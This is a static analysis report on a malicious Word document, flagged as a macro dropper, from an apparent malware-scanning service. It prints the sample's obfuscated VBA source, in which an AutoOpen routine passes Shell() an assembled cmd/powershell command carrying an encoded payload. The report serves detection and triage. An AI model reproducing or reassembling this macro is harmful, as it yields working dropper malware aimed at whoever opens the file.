Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5698005a426b0824…

MALICIOUS

Office (OLE)

86.0 KB Created: 2018-06-06 07:31:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: a886bf5b8de5413c97244949d83da34c SHA-1: bb47b6d8ea2c9f14cf416e7645e42e67153dd5fc SHA-256: 5698005a426b08240a90774661298b7e387aec0d2536f53a2dbe7ccea9af7f97
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6574760-0' suggests it acts as a dropper for other malware. The VBA code appears to be obfuscated, but the presence of the Shell() call is a strong indicator of malicious intent to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6574783-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574783-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11214 bytes
SHA-256: 651f622a4d7eba5d4017d4b674a0229d0d28a1efc4699eecc00c25b8ac8c3210
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CswGkYsKwrLu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lpRBt()
On Error Resume Next
StDRTI = Hex(imucun + Hex(ZjMbZJ) * 6048 + Round(OrtJLa))
KiKXuv = Cos(MMQMDz)
fXujY = CDate(NiwvJ)
SiMYJw = Cos(zbQRW)
jiTAKN = Hex(DkjUw + Hex(nTQbhO) * 27631 + Round(cMAoH))
CAnPF = Cos(noYui)
hDjivs = CDate(fJhiz)
DHkGVS = Cos(DwCCz)
lpRBt = jHcXvUYJT + Shell(LkGvlPjKRD + Chr(FrbcFvJcT + vbKeyC + BzSPs) + kRFcWjREja + USLATvI + RFfJWLEYVXU + hwPlNiwOCl + idtorAIKbu + lNMkvt, 36552 - 36552)
Oaqwu = Hex(tvhKZ + Hex(QIObGV) * 34322 + Round(hCQCiD))
VijBjk = Cos(dzpKmM)
nVzKL = CDate(Kwcrh)
JmMJnP = Cos(uXMzJt)
End Function
Sub Autoopen()
On Error Resume Next
ofOlw = Hex(FitjTr + Hex(wRXGr) * 38461 + Round(bqQqCu))
RiaYoR = Cos(Pijqv)
fbsfqv = CDate(sdAGFp)
iwOYjB = Cos(nASIfa)
lpRBt
imnQv = Hex(QAzlA + Hex(CCohU) * 35153 + Round(UTRQLG))
KsaZXL = Cos(VJqMq)
ThhBd = CDate(dzlwS)
pjFDRV = Cos(JBLYZX)
End Sub


Attribute VB_Name = "oljswViIf"
Function kRFcWjREja()
On Error Resume Next
BEEGwI = Hex(XBUkw + Hex(InJFS) * 56861 + Round(taicL))
TuJqnj = Cos(LIrji)
aDiim = CDate(ozZwP)
lBlra = Cos(cuAoIN)
RiVhCYoJ = "md LmRYs" + "pB oqnpH" + "wQNicAhGYOPqCS" + "Dlq ztvmkR" + "qbndNj &   " + "  %^c^o"
jEtzz = Hex(caNDNO + Hex(rGWwtw) * 88019 + Round(BfRTi))
EjEmu = Cos(TFRvA)
AnwXwX = CDate(iiVXDu)
TuiZb = Cos(RiXrJR)
QiFaPqPYD = "^m^S^p^E^c^% " + "  " + "  " + "%^c^o^m^S^p^E^" + "c^%     " + "/V " + "      " + "  /c     " + "      set %GMZ"
zdmob = Hex(TzGSdj + Hex(rDiiLA) * 84224 + Round(zYasUU))
VPHOj = Cos(iBwjw)
aNNcA = CDate(hoNwpf)
ZjAEL = Cos(HbLcrK)
LPhRwz = "wfkkVT" + "iXENDJ%" + "=m" + "jZD" + "ABp&&s" + "et %YYwKfvi"
ApMCm = Hex(PsRWj + Hex(ZzmjuZ) * 50408 + Round(EHViwk))
pfPkWR = Cos(ssbLKn)
QIMQI = CDate(wUvQCQ)
KsTiFB = Cos(aNBlN)
RBziOVF = "tGhzo%=p&&set" + " %" + "nNpAolWfwkjR" + "%=o^w&&se" + "t %NCidR"
oHuEjP = Hex(MozIOo + Hex(oUjwhF) * 68263 + Round(zYtFIV))
DGbCiz = Cos(arhndW)
tKURC = CDate(FdCDIu)
HVLdG = Cos(WkshL)
cFwFCMdT = "lZoE" + "spHC" + "RD%=SA" + "USUWqZjHoo&&s" + "et %zr" + "crbJbiADFkv" + "F%=!%YYwKfvi" + "tGhzo%!&&set" + " %D" + "DKiFWLwBHSkuqS"
CzusR = Hex(bNDGOZ + Hex(GsjZDX) * 88220 + Round(jjEjDh))
zlAdI = Cos(zdLll)
hhJBH = CDate(pzYnLp)
RZSSq = Cos(OMOOS)
VEuYKSVHqJb = "%=XvGk" + "jzHC&&s" + "et %SwVIAwzjbsT" + "cj%=e^r&&set" + " %wnClNrJ" + "kXsUl" + "Z%=!%nNpAolWfwk" + "jR%!&&se"
kQjGP = Hex(nSNMC + Hex(fwuOh) * 77762 + Round(aKSqh))
KVZWwS = Cos(rvWVI)
IPXXwF = CDate(tntRz)
aCrvSa = Cos(ZFCOvQ)
dFsAUKaCsuF = "t %ZTljkDuVFt" + "QY%=s&&" + "set %fiVrLE" + "wJwl" + "kAiGC%=" + "GHlKikYiDiB&&se" + "t %WCboOsocl" + "Xwhz%=he&&" + "se"
jhjaYG = Hex(fvCnVl + Hex(nWcHX) * 33506 + Round(QzAEvI))
DNJbj = Cos(nLETt)
quGpHw = CDate(pmiaGY)
AShjVd = Cos(VcitMp)
EUjdhXwwE = "t %DLUWXE" + "DwMLAzO" + "%=ll&&!%zrc" + "rbJbiAD" + "FkvF" + "%!"
WbSJO = Hex(awKKtI + Hex(ThUmC) * 6763 + Round(KUdVzP))
VRXvuG = Cos(SKQRs)
YCIXpN = CDate(doIwr)
JOBwz = Cos(zjFjm)
jqLRA = "!%wn" + "ClNrJ" + "kXsUlZ%!!%" + "SwVIAwzjbsTc" + "j%!!"
wBqBX = Hex(VJJII + Hex(GfkrR) * 63365 + Round(bDmzA))
MTFtK = Cos(VWHrL)
cREaiw = CDate(FprRb)
RYXKL = Cos(EqjKk)
YGkSP = "%ZTljkDuV" + "FtQY%!!%WCbo" + "OsoclXw" + "hz%!!%DLUW" + "XEDwMLAz" + "O%!  -e KAAgAG4"
kRFcWjREja = RiVhCYoJ + QiFaPqPYD + LPhRwz + RBziOVF + cFwFCMdT + VEuYKSVHqJb + dFsAUKaCsuF + EUjdhXwwE + jqLRA + YGkSP
End Function
Function USLATvI()
On Error Resume Next
Qzonp = Hex(oYKpPE + Hex(Vnwub) * 39784 + Round(dltuz))
vfGqs = Cos(UJRzM)
AsdCz = CDate(ISJqZI)
HqimiG = Cos(pdDJST)
zGoCjBiw = "AR" + "QBXAC0ATwBiAEoA" + "RQ" + "BjAHQAI"
JkrDnj = Hex(bcYaoQ + Hex(fCFFzv) * 70987 + Round(mWntS))
WpUkdj = Cos(iSmlYS)
NJMqpH = CDate(bzDUX)
tzUQu = Cos(zEnDp)
ratnfCGwj = "AAgAFMAWQBzAH" + "QARQBtA" + "C4ASQBPAC4AUw" + "BUAFIARQBh" + "AE0AUgBFAGEAZA" + "BFAF"
kmw
... (truncated)